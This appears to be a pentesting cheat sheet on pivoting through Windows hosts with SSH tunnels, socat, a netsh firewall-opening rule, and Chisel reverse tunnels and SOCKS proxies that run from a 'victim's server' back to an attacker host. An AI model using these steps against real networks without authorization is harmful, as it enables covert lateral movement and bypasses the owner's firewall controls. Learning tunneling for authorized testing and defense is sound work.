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Windows port forwarding

1. Port forwarding via SSH

SSH can be used to perform tunneling. Nowadays Windows is distrubuted with the OpenSSH client included by default.

1.1. Remote port forwarding

   IP1                  IP2 (pivot)           IP3
|'''''''|            |'''''''|             |'''''''|
| port1 | ---------> |  SSH  | ----------> | port3 | 
|,,,,,,,|            |,,,,,,,|             |,,,,,,,|
ssh <user1>@<ip1> -R <port1>:<ip3>:<port3> -N

Now the ip3:port3 is available from ip1 on user1@localhost:port1. Port numbers don't need to match. Local port localhost:9999 can be forwarded to the remote RDP service.

1.2. Local port forwarding

   IP1                 IP2 (pivot)            IP3
|'''''''|            |'''''''|             |'''''''|
| port1 | <--------- | port2 | <---------- |,,,,,,,| 
|,,,,,,,|            |  SSH  |             
ssh <user1>@<ip1> -L *:<port1>:<port2>

Now the ip1:port1 is available from ip3 via ip2:port2. In other words, ip2:port2 points to ip1:port1.

2. Port forwarding with Socat

Socat allows to forward ports in a simpler way than SSH but it have to be transfered to the pivot host.

   IP1              IP2 (pivot)               IP3
|'''''''|            |'''''''|             |'''''''|
|,,,,,,,| ---------> | port2 | ----------> | port3 | 
                     |  SSH  |             |,,,,,,,|

Socat performs some kind of a reversed local port forwarding. It opens local (IP2 pivot) port. It's easier than connecting to the IP1 directly but it might require to create a firewall rule to allow any connections to the opened port.

socat TCP4-LISTEN:<port2>,fork TCP4:<ip3>:<port3>

Now the ip3:port3 is available via ip2:port2. To open the pivot's port:

netsh advfirewall firewall add rule name="Open Port <port2>" dir=in action=allow protocol=TCP localport=<port2>

3. Chisel tool

Chisel is a swiss-knife tool (Linux and Windows) for any kind of a port forwarding.

3.1. Reverse port-forwarding

It makes connection from the server to the attacker host.

# 1. Run on attacker's host
chisel server --reverse --port 9001
# 2. Run on victim's server (forward :local-port to :open-port)
chisel client <attacker-ip>:9001 R:<open-port>:<local-port>
# 3. Now open in browser: http://localhost:<open-port>

3.2. Reverse port-forwarding using SOCKS proxy

It is useful if we want to access many ports on the victim's machine.

# 1. Run on attacker's host
chisel server --reverse --port 9001
# 2. Run on victim's server (forward socks to :open-port)
chisel client R:<open-port>:socks
# 3. Add following line in /etc/proxychains4.conf
socks5 <open-port>

Now you can use proxychains before every command to tunnel the requests to the victim's server. There is also configuration in the Burp Suite for that purpose.